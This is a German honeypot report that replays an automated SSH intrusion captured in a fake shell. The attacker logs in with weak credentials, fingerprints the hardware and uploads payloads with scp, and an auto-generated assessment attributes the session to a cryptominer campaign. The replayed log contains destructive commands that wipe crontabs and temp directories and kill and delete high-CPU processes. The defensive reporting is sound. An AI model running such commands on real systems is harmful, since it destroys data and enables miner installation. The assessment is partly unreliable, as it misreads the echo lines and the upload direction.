ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

07.10.2026, 05:00 UTC · 70 Befehle · über ssh · Niederlande

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
shadow / qwerty

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
shadow@srv01: ~

shadow@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
shadow@srv01:~$ uname -m | awk '{printf $1}'
x86_64
shadow@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
up 8 days, 03:45
shadow@srv01:~$ lspci | egrep VGA && lspci | grep 3D
00:02.0 VGA compatible controller: Intel Corporation Xeon E3-1200 v5/E3-1200 v6 | 3rd Generation Core (Intel 4th Gen) Integrated Graphics Controller (rev 06)
shadow@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
Intel(R) Xeon(R) CPU E5-2620 v4 @ 2.10GHz
shadow@srv01:~$ curl ipinfo.io/org
AS140612
shadow@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
bash: nvidia-smi: command not found
shadow@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
shadow@srv01:~$ uname -n | awk '{printf $1}'
vps-12
shadow@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
bash: pidof: command not found
bash: pkill: command not found
shadow@srv01:~$ echo qwerty > /tmp/d.log
shadow@srv01:~$ scp -qt "/var/tmp/TeRUjcUZ"
shadow@srv01:~$ scp -qt "/tmp/TeRUjcUZ"
shadow@srv01:~$ scp -qt "/dev/shm/TeRUjcUZ"
shadow@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
shadow@srv01:~$ nvidia-smi -q | grep "Product Name"
bash: nvidia-smi: command not found
shadow@srv01:~$ uname -r | awk '{printf $1}'
4.15.0-213-generic
shadow@srv01:~$ echo changeme > /tmp/d.log
shadow@srv01:~$ scp -qt "/var/tmp/JkqhXQpK"
shadow@srv01:~$ scp -qt "/tmp/JkqhXQpK"
shadow@srv01:~$ scp -qt "/dev/shm/JkqhXQpK"
shadow@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
shadow@srv01:~$ echo Password > /tmp/d.log
shadow@srv01:~$ scp -qt "/var/tmp/euDzGKrl"
shadow@srv01:~$ scp -qt "/tmp/euDzGKrl"
shadow@srv01:~$ scp -qt "/dev/shm/euDzGKrl"
shadow@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
shadow@srv01:~$ echo pass > /tmp/d.log
shadow@srv01:~$ scp -qt "/var/tmp/rzoykfia"
shadow@srv01:~$ scp -qt "/tmp/rzoykfia"
shadow@srv01:~$ scp -qt "/dev/shm/rzoykfia"
shadow@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
shadow@srv01:~$ echo administrator > /tmp/d.log
shadow@srv01:~$ scp -qt "/var/tmp/mbbfNpkW"
shadow@srv01:~$ scp -qt "/tmp/mbbfNpkW"
shadow@srv01:~$ scp -qt "/dev/shm/mbbfNpkW"
shadow@srv01:~$ uname -s -v -n -r -m
Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64
shadow@srv01:~$ echo Admin > /tmp/d.log
shadow@srv01:~$ scp -qt "/var/tmp/NaCedaUa"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich mit schwachen Zugangsdaten über SSH an und führte eine Reihe von Systemabfragen durch, um Hardwarekomponenten wie CPU und Grafikkarte zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung, um Ressourcen freizugeben. Danach versuchte er, mehrere Dateien über SCP in verschiedene temporäre Verzeichnisse zu übertragen, wobei er wiederholt dieselben Muster mit unterschiedlichen Dateinamen wiederholte.

Was die Befehle bewirken

Die Befehle uname, lscpu und lspci sammeln Informationen über das Betriebssystem, die CPU und die Grafikkarte, um die Mining-Fähigkeiten des Systems zu prüfen. Der Befehl crontab -r löscht geplante Aufgaben, während rm -rf temporäre Dateien entfernt, um Spuren zu verwischen. Der awk-Befehl identifiziert Prozesse mit hoher CPU-Last und beendet diese, um Rechenleistung für den Miner zu sichern. Die scp-Befehle mit dem Flag -qt übertragen Dateien im Batch-Modus in spezifische Pfade wie /var/tmp oder /dev/shm, was auf das Hochladen von Schadsoftware hindeutet. Die echo-Befehle schreiben Teststrings in Logdateien, um die Schreibrechte in diesen Verzeichnissen zu verifizieren.

Worauf es hinauslief

Das Vorgehen deutet stark auf die Installation eines Kryptominers hin, da die Abfrage der GPU-Modelle und das Beenden konkurrierender Prozesse typische Vorbereitungsschritte sind. Die wiederholten SCP-Übertragungen in versteckte Verzeichnisse dienen vermutlich dem Download der Mining-Software oder eines Botnet-Agents. Da die Shell als Fake-Shell antwortete, blieb die eigentliche Payload-Ausführung aus, aber die Absicht ist klar erkennbar.

Einordnung

Dieses Muster ist bei automatisierten Botnet-Angriffen sehr verbreitet, da Skripte standardisierte Abfragen und Platzhalter für Payloads nutzen. Die Kombination aus Hardware-Erkennung und aggressiver Prozessbereinigung ist ein klassisches Indiz für automatisierte Mining-Kampagnen.